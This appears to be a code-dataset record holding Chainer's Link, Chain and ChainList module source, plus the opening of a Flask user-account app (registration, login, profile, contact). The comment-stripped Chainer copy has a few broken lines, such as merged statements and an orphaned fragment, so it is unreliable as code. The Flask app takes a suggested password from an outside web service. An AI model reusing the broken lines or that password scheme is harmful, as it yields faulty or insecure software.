``share``, each block is same to others in terms of not only
parameters but also the object IDs because they are shallow-copied,
so that when the parameter of one block is changed, all the
parameters in the others also change.
Args:
n_repeat (int): Number of times to repeat.
mode (str): It should be either ``init``, ``copy``, or ``share``.
``init`` means parameters of each repeated element in the
returned :class:`~chainer.Sequential` will be re-initialized,
so that all elements have different initial parameters.
``copy`` means that the parameters will not be re-initialized
but object itself will be deep-copied, so that all elements
have same initial parameters but can be changed independently.
``share`` means all the elements which consist the resulting
:class:`~chainer.Sequential` object are same object because
they are shallow-copied, so that all parameters of elements
are shared with each other.
"""
ret = chainer.Sequential()
if n_repeat <= 0:
return ret
if mode not in ['init', 'copy', 'share']:
raise ValueError(
'The \'mode\' argument should be either \'init\','
'\'copy\', or \'share\'. But {} was given.'.format(mode))
link = self
for _ in range(n_repeat):
ret.append(link.copy(mode))
return ret
def count_params(self):
# type: () -> int
"""Counts the total number of parameters.
This method counts the total number of scalar values included in all
the :class:`~chainer.Parameter`\\ s held by this link and its
descendants.
        If the link contains uninitialized parameters, this method raises a
warning.
Returns:
The total size of parameters (int)
"""
size = 0
for name, param in self.namedparams():
if param.array is None:
warnings.warn(
'Parameter \'{}\' has not been initialized, so the '
'resulting count will not include the number of parameters'
' in it.'.format(name))
continue
size += param.size
return size
def add_hook(self, hook, name=None):
# type: (chainer.LinkHook, tp.Optional[str]) -> 'Link'
"""Registers a link hook.
Args:
hook (~chainer.LinkHook): Link hook to be registered.
name (str): Name of the link hook. The name must be unique
among link hooks registered to this link. If ``None``,
the default name of the link hook is used.
Returns:
self
"""
if not isinstance(hook, link_hook.LinkHook):
raise TypeError('Hook must be of type LinkHook')
if name is None:
name = hook.name
hooks = self.local_link_hooks
if name in hooks:
raise KeyError('Hook %s already exists' % name)
hooks[name] = hook
hook.added(self)
return self
def delete_hook(self, name):
# type: (str) -> None
"""Unregisters the link hook.
Args:
name (str): The name of the link hook to be unregistered.
"""
if name in self.local_link_hooks:
self.local_link_hooks[name].deleted(self)
del self.local_link_hooks[name]
else:
raise KeyError('Hook %s does not exist' % name)
class Chain(Link):
"""Composable link with object-like interface.
Composability is one of the most important features of neural nets. Neural
net models consist of many reusable fragments, and each model itself might
be embedded into a larger learnable system. Chain enables us to write a
neural net based on composition, without bothering about routine works like
collecting parameters, serialization, copying the structure with parameters
shared, etc.
This class actually provides a way to compose one or more links into one
structure. A chain can contain one or more *child links*. Child link is a
link registered to the chain with its own name. The child link is stored to
an attribute of the chain with the name. User can write a whole model or a
fragment of neural nets as a child class of Chain.
Each chain itself is also a link. Therefore, one can combine chains into
higher-level chains. In this way, links and chains construct a *link
hierarchy*. Link hierarchy forms a tree structure, where each node is
identified by the path from the root. The path is represented by a string
like a file path in UNIX, consisting of names of nodes on the path, joined
by slashes ``/``.
A child link can be added just by assigning it to an attribute of the
chain within :meth:`~chainer.Chain.init_scope`.
The registered child link is saved and loaded on serialization and
deserialization, and involved in the optimization. The registered link
is called a child. The child link is accessible via :meth:`children`
generator, which returns a generator running through the children in
lexical order.
On registration of a child link, its :attr:`~Link.name` attribute is also
set (or overwritten if the link has already been registered to another
chain).
.. admonition:: Example
This is a simple example of custom chain definition. Chainer itself also
provides some chains defined under the :mod:`~chainer.links` module.
They might serve as examples, too.
Consider we want to define a multi-layer perceptron consisting of two
hidden layers with rectifiers as activation functions. We can use the
:class:`~chainer.links.Linear` link as a building block::
import chainer
import chainer.functions as F
import chainer.links as L
class MultiLayerPerceptron(chainer.Chain):
def __init__(self, n_in, n_hidden, n_out):
super(MultiLayerPerceptron, self).__init__()
with self.init_scope():
self.layer1 = L.Linear(n_in, n_hidden)
self.layer2 = L.Linear(n_hidden, n_hidden)
self.layer3 = L.Linear(n_hidden, n_out)
def forward(self, x):
# Forward propagation
h1 = F.relu(self.layer1(x))
h2 = F.relu(self.layer2(h1))
return self.layer3(h2)
Child links are registered via the assignment within a
``with self.init_scope():`` block. The forward propagation is often
implemented as the ``forward`` operator as the above example, though
it is not mandatory.
Args:
links: Child links. The keywords are used as their names. The names are
also set to the links.
"""
def __init__(self, **links):
# type: (**Link) -> None
super(Chain, self).__init__()
self._children = set() # type: tp.Set[str]
for name, link in six.iteritems(links):
self.add_link(name, link)
def __str__(self):
reps = []
for child in self.children():
rep = '({name}): {rep},'.format(
name=child.name, rep=str(child),
)
# Add indentation to each line.
for line in rep.splitlines():
reps.append(' {line}\n'.format(line=line))
reps = ''.join(reps)
if reps: # No newline with no children.
reps = '\n' + reps
return '{cls}({children})'.format(
cls=self.__class__.__name__, children=reps,
)
def __getitem__(self, name):
# type: (str) -> tp.Any
"""Equivalent to getattr."""
return getattr(self, name)
def __setattr__(self, name, value):
# type: (str, tp.Any) -> None
if self.within_init_scope and isinstance(value, Link):
if hasattr(self, name):
raise AttributeError(
'cannot register a new link %s: attribute exists' % name)
value.name = name
self._children.add(name)
super(Chain, self).__setattr__(name, value)
def __delattr__(self, name):
# type: (str) -> None
self._children.discard(name)
super(Chain, self).__delattr__(name)
def add_link(self, name, link):
# type: (str, Link) -> None
"""Registers a child link to this chain.
Args:
name (str): Name of the child link. This name is also used as the
attribute name.
link (Link): The link object to be registered.
"""
if name in self.__dict__:
raise AttributeError(
'cannot register a new link %s: attribute exists' % name)
if not isinstance(link, Link):
raise TypeError('cannot register a non-link object as a child')
with self.init_scope():
setattr(self, name, link)
def copy(self, mode='share'):
# type: (str) -> 'Chain'
ret = super(Chain, self).copy() # type: ignore # should be Chain
ret._children = set(ret._children) # type: ignore
d = ret.__dict__ # type: tp.Dict[str, Link]
for name in ret._children: # type: ignore
# copy child links recursively
copied = d[name].copy(mode)
copied.name = name
d[name] = copied
return ret # type: ignore
def device_resident_accept(self, visitor):
super(Chain, self).device_resident_accept(visitor)
d = self.__dict__
for name in self._children:
d[name].device_resident_accept(visitor)
def params(self, include_uninit=True):
# type: (bool) -> tp.Iterator[chainer.Parameter]
for param in super(Chain, self).params(include_uninit):
yield param
d = self.__dict__ # type: tp.Dict[str, Link]
for name in sorted(self._children):
for param in d[name].params(include_uninit):
yield param
def namedparams(self, include_uninit=True):
# type: (bool) -> tp.Iterator[tp.Tuple[str, chainer.Parameter]]
for ret in super(Chain, self).namedparams(include_uninit):
yield ret
d = self.__dict__ # type: tp.Dict[str, Link]
for name in sorted(self._children):
prefix = '/' + name
for path, param in d[name].namedparams(include_uninit):
yield prefix + path, param
def links(self, skipself=False):
# type: (bool) -> tp.Iterator[Link]
if not skipself:
yield self
d = self.__dict__ # type: tp.Dict[str, Link]
for name in sorted(self._children):
for link in d[name].links():
yield link
def namedlinks(self, skipself=False):
# type: (bool) -> tp.Iterator[tp.Tuple[str, Link]]
if not skipself:
yield '/', self
d = self.__dict__ # type: tp.Dict[str, Link]
for name in sorted(self._children):
child = d[name]
prefix = '/' + name
yield prefix, child
for path, link in d[name].namedlinks(True):
yield prefix + path, link
def children(self):
# type: () -> tp.Iterator[Link]
d = self.__dict__ # type: tp.Dict[str, Link]
for name in sorted(self._children):
yield d[name]
def copyparams(self, link, copy_persistent=True):
# type: (Link, bool) -> None
super(Chain, self).copyparams(link, copy_persistent)
src = link.__dict__
dst = self.__dict__
for name in self._children:
dst[name].copyparams(src[name], copy_persistent)
def addgrads(self, link):
# type: (Link) -> None
super(Chain, self).addgrads(link)
src = link.__dict__
dst = self.__dict__
for name in self._children:
dst[name].addgrads(src[name])
def serialize(self, serializer):
# type: (chainer.AbstractSerializer) -> None
super(Chain, self).serialize(serializer)
d = self.__dict__ # type: tp.Dict[str, Link]
for name in self._children:
d[name].serialize(serializer[name])
class ChainList(Link, collections_abc.MutableSequence):
"""Composable link with list-like interface.
This is another example of compositional link. Unlike :class:`Chain`, this
class can be used like a list of child links. Each child link is indexed by
a non-negative integer, and it maintains the current number of registered
child links. The :meth:`add_link` method inserts a new link at the end of
    the list. It is useful to write a chain with an arbitrary number of child
links, e.g. an arbitrarily deep multi-layer perceptron.
This class inherits the methods `index`, `count`, `append`, `reverse`,
`extend`, `pop`, `remove` from `collections.abc.MutableSequence` and
can be accessed and assigned by index or slice.
Args:
links: Initial child links.
"""
def __init__(self, *links):
# type: (*Link) -> None
super(ChainList, self).__init__()
self._children = [] # type: tp.List[Link]
for link in links:
self.add_link(link)
def __str__(self):
reps = []
for index, child in enumerate(self._children):
rep = '({index}): {rep},'.format(
index=index, rep=str(child),
)
# Add indentation to each line.
for line in rep.splitlines():
reps.append(' {line}\n'.format(line=line))
reps = ''.join(reps)
if reps: # No newline with no children.
reps = '\n' + reps
return '{cls}({children})'.format(
cls=self.__class__.__name__, children=reps,
)
def __setattr__(self, name, value):
# type: (str, tp.Any) -> None
if self.within_init_scope and isinstance(value, Link):
raise TypeError(
'cannot register a new link'
' within a "with chainlist.init_scope():" block.')
super(ChainList, self).__setattr__(name, value)
def __setitem__(self, index, value):
# type: (tp.Union[int, slice], tp.Union[Link, tp.Iterable[Link]]) -> None # NOQA
if isinstance(index, int):
link = value # type: ignore # should be Link
link.name = str(index) # type: ignore
self._children[index] = link # type: ignore
elif isinstance(index, slice):
self._children[index] = value # type: ignore # should be Iterable[Link] # NOQA
for i, c in enumerate(self._children): # type: ignore
c.name = str(i)
else:
raise TypeError(
'ChainList indices must be integers or slices, not %s' %
type(index).__name__)
def __getitem__(self, index):
"""Returns the child at given index.
Args:
index (int): Index of the child in the list.
Returns:
Link: The ``index``-th child link.
"""
return self._children[index]
def __delitem__(self, index):
# type: (tp.Union[int, slice]) -> None
del self._children[index]
for i, c in enumerate(self._children):
c.name = str(i)
def insert(self, index, link):
# type: (int, Link) -> None
"""Insert a child link at the given index.
Args:
index (int): The position of the list where the new
link is inserted.
link (Link): The link to be inserted.
"""
if index == len(self._children):
self._children.append(link)
link.name = str(index)
else:
self._children.insert(index, link)
for i, c in enumerate(self._children):
c.name = str(i)
def __iter__(self):
# type: () -> tp.Iterator[Link]
return iter(self._children)
def __len__(self):
# type: () -> int
"""Returns the number of children."""
return len(self._children)
def add_link(self, link):
# type: (Link) -> None
"""Registers a child link and adds it to the tail of the list.
Args:
link (Link): The link object to be registered.
"""
self.append(link)
def copy(self, mode='share'):
# type: (str) -> 'ChainList'
"""Returns a deep copy of the chainlist."""
ret = super(ChainList, self).copy() # type: ignore # should be ChainList # NOQA
ret._children = list(ret._children) # type: ignore # copy
children = ret._children # type: ignore
for i, child in enumerate(children):
child = child.copy(mode)
child.name = str(i)
children[i] = child
return ret # type: ignore
def device_resident_accept(self, visitor):
super(ChainList, self).device_resident_accept(visitor)
for link in self._children:
link.device_resident_accept(visitor)
def params(self, include_uninit=True):
# type: (bool) -> tp.Iterator[chainer.Parameter]
for param in super(ChainList, self).params(include_uninit):
yield param
for link in self._children:
for param in link.params(include_uninit):
yield param
def namedparams(self, include_uninit=True):
# type: (bool) -> tp.Iterator[tp.Tuple[str, chainer.Parameter]]
for ret in super(ChainList, self).namedparams(include_uninit):
yield ret
for idx, link in enumerate(self._children):
prefix = '/%d' % idx
for path, param in link.namedparams(include_uninit):
yield prefix + path, param
def links(self, skipself=False):
# type: (bool) -> tp.Iterator[Link]
if not skipself:
yield self
for child in self._children:
for link in child.links():
yield link
def namedlinks(self, skipself=False):
# type: (bool) -> tp.Iterator[tp.Tuple[str, Link]]
if not skipself:
yield '/', self
for idx, child in enumerate(self._children):
prefix = '/%d' % idx
yield prefix, child
for path, link in child.namedlinks(True):
yield prefix + path, link
def children(self):
# type: () -> tp.Iterator[Link]
for child in self._children:
yield child
def copyparams(self, link, copy_persistent=True):
# type: (Link, bool) -> None # link is actually a ChainList
super(ChainList, self).copyparams(link, copy_persistent)
for idx, child in enumerate(self._children):
child.copyparams(link[idx], copy_persistent) # type: ignore
def addgrads(self, link):
# type: (Link) -> None # link is actually a ChainList
super(ChainList, self).addgrads(link)
for idx, child in enumerate(self._children):
child.addgrads(link[idx]) # type: ignore
def serialize(self, serializer):
# type: (chainer.AbstractSerializer) -> None
super(ChainList, self).serialize(serializer)
for idx, child in enumerate(self._children):
child.serialize(serializer['%d' % idx])
| 36.365893
| 119
| 0.595341
|
from __future__ import absolute_import
import collections
import contextlib
import copy
import typing as tp
import warnings
import numpy
import six
import chainer
from chainer import backend
from chainer.backends import cuda
from chainer import device_resident
from chainer import initializers
from chainer import link_hook
from chainer import types
from chainer.utils import collections_abc
from chainer import variable
def _is_shape(value):
if value is None:
return True
elif isinstance(value, collections_abc.Sequence):
try:
return all(int(x) for x in value)
except TypeError:
return False
try:
int(value)
return True
except TypeError:
return False
def _ensure_shape_dtype(value):
if _is_shape(value):
return value, numpy.float32
else:
return value
class Link(device_resident.DeviceResident):
_local_link_hooks = None _init_done = False
def __init__(self, **params):
super(Link, self).__init__()
self._params = set()
self._persistent = set()
self._within_init_scope = False
self.name = None
self.__init_done = True
for name, value in six.iteritems(params):
shape, dtype = _ensure_shape_dtype(value)
self.add_param(name, shape, dtype=dtype)
def __check_init_done(self):
if not self.__init_done:
raise RuntimeError('Link.__init__() has not been called.')
def __str__(self):
specs = ', '.join(
'{}={}'.format(k, v) for k, v in self.printable_specs
)
return '{cls}({specs})'.format(
cls=self.__class__.__name__, specs=specs,
)
@property
def local_link_hooks(self):
if self._local_link_hooks is None:
self._local_link_hooks = collections.OrderedDict()
return self._local_link_hooks
@property
def _n_local_link_hooks(self):
return (0 if self._local_link_hooks is None
else len(self._local_link_hooks))
@property
def _device_id(self):
warnings.warn(
'Link._device_id is left only for backward compatibility and '
'likely to be removed. Use Link.device instead.',
DeprecationWarning)
device = self.device
if device.xp is cuda.cupy:
return device.device.id
return None
@property
def printable_specs(self):
if 0:
yield
@property
def within_init_scope(self):
return getattr(self, '_within_init_scope', False)
@contextlib.contextmanager
def init_scope(self):
self.__check_init_done()
old_flag = self.within_init_scope
self._within_init_scope = True
try:
yield
finally:
self._within_init_scope = old_flag
def __call__(self, *args, **kwargs):
self.__check_init_done()
hooks = chainer._get_link_hooks()
if self._n_local_link_hooks > 0:
hooks = collections.OrderedDict(hooks)
hooks.update(self.local_link_hooks)
hooks = hooks.values()
if hooks:
pre_cb_args = link_hook._ForwardPreprocessCallbackArgs(
self, 'forward', args, kwargs)
for hook in hooks:
hook.forward_preprocess(pre_cb_args)
'__call__', None)
if forward is None:
forward = self.forward
out = forward(*args, **kwargs)
if hooks:
post_cb_args = link_hook._ForwardPostprocessCallbackArgs(
self, 'forward', args, kwargs, out)
for hook in hooks:
hook.forward_postprocess(post_cb_args)
return out
def __setattr__(self, name, value):
if self.within_init_scope and isinstance(value, variable.Parameter):
value.name = name
self._params.add(name)
self._persistent.discard(name)
super(Link, self).__setattr__(name, value)
def __delattr__(self, name):
self._params.discard(name)
self._persistent.discard(name)
super(Link, self).__delattr__(name)
def add_param(self, name, shape=None, dtype=numpy.float32,
initializer=None):
if name in self.__dict__:
raise AttributeError(
'cannot register a new parameter %s: attribute exists'
% name)
if initializer is None:
initializer = initializers.NaN(dtype)
param = variable.Parameter(initializer, shape)
with self.init_scope():
setattr(self, name, param)
def add_persistent(self, name, value):
d = self.__dict__
if name in d:
raise AttributeError(
'cannot register a new persistent value %s: attribute exists'
% name)
self._persistent.add(name)
self._params.discard(name)
d[name] = value
def register_persistent(self, name):
if not hasattr(self, name):
raise AttributeError(
'cannot register non-existent attribute %s as a persistent '
'value' % name)
self._persistent.add(name)
self._params.discard(name)
def copy(self, mode='share'):
if mode == 'share':
ret = copy.copy(self)
ret._params = set(self._params)
ret._persistent = set(self._persistent)
ret.name = None
d = ret.__dict__
for name in ret._params:
d[name] = copy.copy(d[name])
d[name].grad = None
return ret
elif mode == 'copy':
return copy.deepcopy(self)
elif mode == 'init':
ret = copy.deepcopy(self)
for param in ret.params(include_uninit=False):
param.initialize(param.shape)
return ret
else:
raise ValueError(
'The \'mode\' argument should be either \'init\','
'\'copy\', or \'share\'. But {} was given.'.format(mode))
def device_resident_accept(self, visitor):
super(Link, self).device_resident_accept(visitor)
d = self.__dict__
for name in self._params:
x = d[name]
visitor.visit_variable(x)
for name in self._persistent:
x = d[name]
if isinstance(x, chainer.get_array_types()):
d[name] = visitor.visit_array(x)
def params(self, include_uninit=True):
d = self.__dict__
for name in sorted(self._params):
if include_uninit or d[name].data is not None:
yield d[name]
def namedparams(self, include_uninit=True):
d = self.__dict__
for name in sorted(self._params):
if include_uninit or d[name].data is not None:
yield '/' + name, d[name]
def links(self, skipself=False):
if not skipself:
yield self
def namedlinks(self, skipself=False):
if not skipself:
yield '/', self
def children(self):
        if 0:
            yield  # Link has no children; Chain and ChainList override this
def copyparams(self, link, copy_persistent=True):
src = link.__dict__
dst = self.__dict__
for name in self._params:
dst[name].copydata(src[name])
if copy_persistent:
array_types = chainer.get_array_types()
for name in self._persistent:
d = dst[name]
s = src[name]
if isinstance(d, array_types) and isinstance(s, array_types):
backend.copyto(d, s)
else:
dst[name] = copy.deepcopy(s)
def cleargrads(self):
for param in self.params():
param.cleargrad()
def zerograds(self):
warnings.warn(
'Link.zerograds is deprecated. Use Link.cleargrads instead.',
DeprecationWarning)
for param in self.params():
param.zerograd()
def addgrads(self, link):
src = link.__dict__
dst = self.__dict__
for name in self._params:
dst[name].addgrad(src[name])
def enable_update(self):
for param in self.params():
rule = param.update_rule
if rule is not None:
rule.enabled = True
def disable_update(self):
for param in self.params():
rule = param.update_rule
if rule is not None:
rule.enabled = False
@property
def update_enabled(self):
for param in self.params():
rule = param.update_rule
if rule is not None and rule.enabled:
return True
return False
def serialize(self, serializer):
d = self.__dict__
for name in self._params:
param = d[name]
data = serializer(name, param.data)
if param.data is None and data is not None:
param.initialize(data.shape)
with chainer.using_device(param.device):
param.data[...] = param.device.send(data)
for name in self._persistent:
d[name] = serializer(name, d[name])
def repeat(self, n_repeat, mode='init'):
ret = chainer.Sequential()
if n_repeat <= 0:
return ret
if mode not in ['init', 'copy', 'share']:
raise ValueError(
            'The \'mode\' argument should be either \'init\', '
'\'copy\', or \'share\'. But {} was given.'.format(mode))
link = self
for _ in range(n_repeat):
ret.append(link.copy(mode))
return ret
def count_params(self):
size = 0
for name, param in self.namedparams():
if param.array is None:
warnings.warn(
'Parameter \'{}\' has not been initialized, so the '
'resulting count will not include the number of parameters'
' in it.'.format(name))
continue
size += param.size
return size
def add_hook(self, hook, name=None):
if not isinstance(hook, link_hook.LinkHook):
raise TypeError('Hook must be of type LinkHook')
if name is None:
name = hook.name
hooks = self.local_link_hooks
if name in hooks:
raise KeyError('Hook %s already exists' % name)
hooks[name] = hook
hook.added(self)
return self
def delete_hook(self, name):
if name in self.local_link_hooks:
self.local_link_hooks[name].deleted(self)
del self.local_link_hooks[name]
else:
raise KeyError('Hook %s does not exist' % name)
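# --- Illustrative sketch (not part of the original module; assumes
# chainer.functions is importable as F). It shows how init_scope() routes a
# Parameter assignment into self._params on a minimal Link subclass:
#
#     import chainer.functions as F
#
#     class Linear(Link):
#         def __init__(self, n_in, n_out):
#             super(Linear, self).__init__()
#             with self.init_scope():
#                 self.W = variable.Parameter(
#                     initializers.Normal(1.0), (n_out, n_in))
#
#         def forward(self, x):
#             return F.linear(x, self.W)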
class Chain(Link):
def __init__(self, **links):
super(Chain, self).__init__()
self._children = set()
for name, link in six.iteritems(links):
self.add_link(name, link)
def __str__(self):
reps = []
for child in self.children():
rep = '({name}): {rep},'.format(
name=child.name, rep=str(child),
)
for line in rep.splitlines():
reps.append(' {line}\n'.format(line=line))
reps = ''.join(reps)
if reps:
reps = '\n' + reps
return '{cls}({children})'.format(
cls=self.__class__.__name__, children=reps,
)
def __getitem__(self, name):
return getattr(self, name)
def __setattr__(self, name, value):
if self.within_init_scope and isinstance(value, Link):
if hasattr(self, name):
raise AttributeError(
'cannot register a new link %s: attribute exists' % name)
value.name = name
self._children.add(name)
super(Chain, self).__setattr__(name, value)
def __delattr__(self, name):
self._children.discard(name)
super(Chain, self).__delattr__(name)
def add_link(self, name, link):
if name in self.__dict__:
raise AttributeError(
'cannot register a new link %s: attribute exists' % name)
if not isinstance(link, Link):
raise TypeError('cannot register a non-link object as a child')
with self.init_scope():
setattr(self, name, link)
def copy(self, mode='share'):
        ret = super(Chain, self).copy()
        ret._children = set(ret._children)
d = ret.__dict__
for name in ret._children:
copied = d[name].copy(mode)
copied.name = name
d[name] = copied
return ret
def device_resident_accept(self, visitor):
super(Chain, self).device_resident_accept(visitor)
d = self.__dict__
for name in self._children:
d[name].device_resident_accept(visitor)
def params(self, include_uninit=True):
for param in super(Chain, self).params(include_uninit):
yield param
d = self.__dict__
for name in sorted(self._children):
for param in d[name].params(include_uninit):
yield param
def namedparams(self, include_uninit=True):
for ret in super(Chain, self).namedparams(include_uninit):
yield ret
d = self.__dict__
for name in sorted(self._children):
prefix = '/' + name
for path, param in d[name].namedparams(include_uninit):
yield prefix + path, param
def links(self, skipself=False):
if not skipself:
yield self
d = self.__dict__
for name in sorted(self._children):
for link in d[name].links():
yield link
def namedlinks(self, skipself=False):
if not skipself:
yield '/', self
d = self.__dict__
for name in sorted(self._children):
child = d[name]
prefix = '/' + name
yield prefix, child
for path, link in d[name].namedlinks(True):
yield prefix + path, link
def children(self):
d = self.__dict__
for name in sorted(self._children):
yield d[name]
def copyparams(self, link, copy_persistent=True):
super(Chain, self).copyparams(link, copy_persistent)
src = link.__dict__
dst = self.__dict__
for name in self._children:
dst[name].copyparams(src[name], copy_persistent)
def addgrads(self, link):
super(Chain, self).addgrads(link)
src = link.__dict__
dst = self.__dict__
for name in self._children:
dst[name].addgrads(src[name])
def serialize(self, serializer):
super(Chain, self).serialize(serializer)
d = self.__dict__
for name in self._children:
d[name].serialize(serializer[name])
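# --- Illustrative sketch (not part of the original module; reuses the
# hypothetical Linear link from the sketch above). Children registered
# inside init_scope() get slash-separated paths from namedparams():
#
#     class MLP(Chain):
#         def __init__(self):
#             super(MLP, self).__init__()
#             with self.init_scope():
#                 self.l1 = Linear(784, 100)
#                 self.l2 = Linear(100, 10)
#
#         def forward(self, x):
#             return self.l2(F.relu(self.l1(x)))
#
#     mlp = MLP()
#     # [path for path, _ in mlp.namedparams()] -> ['/l1/W', '/l2/W']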
class ChainList(Link, collections_abc.MutableSequence):
def __init__(self, *links):
super(ChainList, self).__init__()
self._children = []
for link in links:
self.add_link(link)
def __str__(self):
reps = []
for index, child in enumerate(self._children):
rep = '({index}): {rep},'.format(
index=index, rep=str(child),
)
for line in rep.splitlines():
reps.append(' {line}\n'.format(line=line))
reps = ''.join(reps)
if reps:
reps = '\n' + reps
return '{cls}({children})'.format(
cls=self.__class__.__name__, children=reps,
)
def __setattr__(self, name, value):
if self.within_init_scope and isinstance(value, Link):
raise TypeError(
'cannot register a new link'
' within a "with chainlist.init_scope():" block.')
super(ChainList, self).__setattr__(name, value)
def __setitem__(self, index, value):
if isinstance(index, int):
            link = value
            link.name = str(index)
self._children[index] = link
elif isinstance(index, slice):
            self._children[index] = value
            for i, c in enumerate(self._children):
c.name = str(i)
else:
raise TypeError(
'ChainList indices must be integers or slices, not %s' %
type(index).__name__)
def __getitem__(self, index):
return self._children[index]
def __delitem__(self, index):
del self._children[index]
for i, c in enumerate(self._children):
c.name = str(i)
def insert(self, index, link):
if index == len(self._children):
self._children.append(link)
link.name = str(index)
else:
self._children.insert(index, link)
for i, c in enumerate(self._children):
c.name = str(i)
def __iter__(self):
return iter(self._children)
def __len__(self):
return len(self._children)
def add_link(self, link):
self.append(link)
def copy(self, mode='share'):
        ret = super(ChainList, self).copy()
        ret._children = list(ret._children)  # shallow-copy the child list
        children = ret._children
for i, child in enumerate(children):
child = child.copy(mode)
child.name = str(i)
children[i] = child
return ret
def device_resident_accept(self, visitor):
super(ChainList, self).device_resident_accept(visitor)
for link in self._children:
link.device_resident_accept(visitor)
def params(self, include_uninit=True):
for param in super(ChainList, self).params(include_uninit):
yield param
for link in self._children:
for param in link.params(include_uninit):
yield param
def namedparams(self, include_uninit=True):
for ret in super(ChainList, self).namedparams(include_uninit):
yield ret
for idx, link in enumerate(self._children):
prefix = '/%d' % idx
for path, param in link.namedparams(include_uninit):
yield prefix + path, param
def links(self, skipself=False):
if not skipself:
yield self
for child in self._children:
for link in child.links():
yield link
def namedlinks(self, skipself=False):
if not skipself:
yield '/', self
for idx, child in enumerate(self._children):
prefix = '/%d' % idx
yield prefix, child
for path, link in child.namedlinks(True):
yield prefix + path, link
def children(self):
for child in self._children:
yield child
def copyparams(self, link, copy_persistent=True):
        super(ChainList, self).copyparams(link, copy_persistent)
for idx, child in enumerate(self._children):
child.copyparams(link[idx], copy_persistent)
def addgrads(self, link):
        super(ChainList, self).addgrads(link)
for idx, child in enumerate(self._children):
child.addgrads(link[idx])
def serialize(self, serializer):
super(ChainList, self).serialize(serializer)
for idx, child in enumerate(self._children):
child.serialize(serializer['%d' % idx])
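# --- Illustrative sketch (not part of the original module). ChainList names
# children by index; copy('share') shares parameter arrays, 'copy' deep-copies
# them, and 'init' re-initializes them; repeat() builds a Sequential:
#
#     layers = ChainList(Linear(784, 100), Linear(100, 10))
#     assert len(layers) == 2 and layers[0].name == '0'
#     shared = layers.copy('share')     # parameters shared with `layers`
#     stack = layers.repeat(3, 'init')  # Sequential of 3 fresh copies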
| true
| true
|
f70b3d490480e2c44304416517d3b896c717c71a
| 5,994
|
py
|
Python
|
application.py
|
jlind062/flippin_flask
|
94c092ad49f9f7ab7995073d3382015d598e45f5
|
[
"MIT"
] | 3
|
2019-06-22T19:00:10.000Z
|
2019-06-23T18:33:46.000Z
|
application.py
|
sourenaKhanzadeh/flippin_flask
|
94c092ad49f9f7ab7995073d3382015d598e45f5
|
[
"MIT"
] | 1
|
2021-06-01T23:52:53.000Z
|
2021-06-01T23:52:53.000Z
|
application.py
|
sourenaKhanzadeh/flippin_flask
|
94c092ad49f9f7ab7995073d3382015d598e45f5
|
[
"MIT"
] | 2
|
2019-06-22T19:00:19.000Z
|
2019-06-22T20:33:19.000Z
|
from flask import Flask, render_template, request, flash, redirect, url_for, session
from flask_sqlalchemy import SQLAlchemy
from flask_mail import Message, Mail
from passlib.hash import sha256_crypt
from functools import wraps
import requests
import time
# create the flask app from config file and instantiate db
application = Flask(__name__)
application.config.from_object('config.AWSConfig')
db = SQLAlchemy(application)
# init mail client
mail = Mail()
mail.init_app(application)
# import here because the models module relies on the db object
from models import Cities, Users, Listings
from forms import RegisterForm, ContactForm, ProfileForm
# custom decorator to verify user is logged in
def is_logged_in(f):
@wraps(f)
def wrap(*args, **kwargs):
if 'logged_in' in session:
return f(*args, **kwargs)
else:
flash ("Please login to see this content.", "danger")
return redirect(url_for('login'))
return wrap
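# Illustrative note (not in the original file): functools.wraps above keeps
# the wrapped view's __name__, which Flask uses as the endpoint name, so the
# decorator stacks safely under @application.route:
#
#     @application.route('/items')
#     @is_logged_in
#     def items(): ...
#     # items.__name__ == 'items'; endpoint registered as 'items'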
# register a user with the RegisterForm, validated through wtforms
# on success, notify the user and redirect; otherwise display the errors
@application.route('/register', methods=['GET', 'POST'])
def register():
form = RegisterForm(request.form)
# use passwordrandom.com to get user ip and recommend password
recommendation = requests.get('https://www.passwordrandom.com/query?command=password')\
.content.decode("utf-8")
ip = requests.get('https://www.passwordrandom.com/query?command=ip').\
content.decode("utf-8")
flash("We recommend using password: '%s'" % recommendation, 'warning')
if request.method == 'POST' and form.validate():
new_user = Users(first=form.first.data,
last=form.last.data,
email=form.email.data,
username=form.username.data,
city=form.city.data,
password=sha256_crypt.encrypt(str(form.password.data)),
ip=ip,
register_date=time.strftime('%Y-%m-%d %H:%M:%S'))
db.session.add(new_user)
db.session.commit()
session.pop('_flashes', None)
flash('Welcome to flippin!\nYour account has been successfully created.', 'success')
return redirect(url_for('index'))
return render_template('register.html', form=form)
# homepage
@application.route('/')
def index():
return render_template('home.html')
# log the user in; wtforms is skipped here since little validation is needed.
@application.route('/login', methods=['GET', 'POST'])
def login():
if request.method == 'POST':
# get user information and query database for match
username = request.form['username']
password_candidate = request.form['password']
result = Users.query.filter_by(username=username).first()
# if info is correct redirect and set session variables
if result is not None:
password = result.password
if sha256_crypt.verify(password_candidate, password):
session['logged_in'] = True
session['username'] = username
session['city'] = result.city
# gets the related city name given the users relevant foreign key
session['city_name'] = Cities.query.filter_by(id=result.city).first().name
flash('Log in successful. Enjoy!', 'success')
return redirect(url_for('items'))
# otherwise return relevant error
else:
return render_template('login.html', error="Invalid password")
else:
return render_template('login.html', error="No user found")
return render_template('login.html')
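# Illustrative sketch (not in the original file): the passlib round-trip that
# login() relies on; note that sha256_crypt.encrypt() used elsewhere in this
# file is a deprecated alias of sha256_crypt.hash():
#
#     from passlib.hash import sha256_crypt
#     stored = sha256_crypt.hash('hunter2')
#     assert sha256_crypt.verify('hunter2', stored)
#     assert not sha256_crypt.verify('wrong', stored)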
# items page, requires that user is logged in
@application.route('/items')
@is_logged_in
def items():
listings = Listings.query.filter_by(city=session['city']).all()
return render_template('items.html', items=listings, length=len(listings))
@application.route('/profile', methods=['GET', 'POST'])
@is_logged_in
def profile():
form = ProfileForm(request.form)
user = Users.query.filter_by(username=session['username']).first()
if request.method == 'POST' and form.validate():
user.email = form.email.data
user.city = form.city.data
user.password = sha256_crypt.encrypt(str(form.password.data))
session['city'] = form.city.data
db.session.commit()
flash('Your account settings have been updated.', 'success')
return redirect(url_for('profile'))
return render_template('profile.html', user=user, form=form)
@application.route('/delete')
@is_logged_in
def delete_user():
db.session.query(Users).filter(Users.username == session['username']).delete()
db.session.commit()
session.clear()
flash('Your account has been deleted! Sorry to see you go.', 'success')
return render_template('home.html')
# logout method, clear session variables and redirect
@application.route('/logout')
def logout():
session.clear()
flash('You are now logged out', 'success')
return redirect(url_for('login'))
# contact page
@application.route('/contact', methods=['GET', 'POST'])
def contact():
form = ContactForm(request.form)
# on submit send email with form contents to and from support email
if request.method == 'POST' and form.validate():
